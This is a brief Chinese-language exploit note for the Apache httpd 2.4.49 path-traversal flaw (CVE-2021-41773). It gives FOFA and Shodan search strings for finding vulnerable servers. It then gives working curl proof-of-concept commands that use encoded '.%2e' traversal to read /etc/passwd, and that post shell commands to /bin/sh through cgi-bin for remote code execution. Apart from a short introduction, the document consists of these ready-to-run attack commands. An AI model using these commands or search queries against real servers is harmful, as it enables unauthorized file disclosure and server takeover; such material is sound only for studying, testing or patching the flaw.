简介
Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。
漏洞原理分析
Apache httpd Server CVE-2021-41773 漏洞分析
漏洞利用
fofa
1 | app = "apache-server/2.4.49" |
shodan
1 | server: Apache/2.4.49 |
POC
本地文件读取
1 | curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" |
RCE
1 | curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh" |
2 | |
3 | curl -s --path-as-is "http://localhost:8787/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" |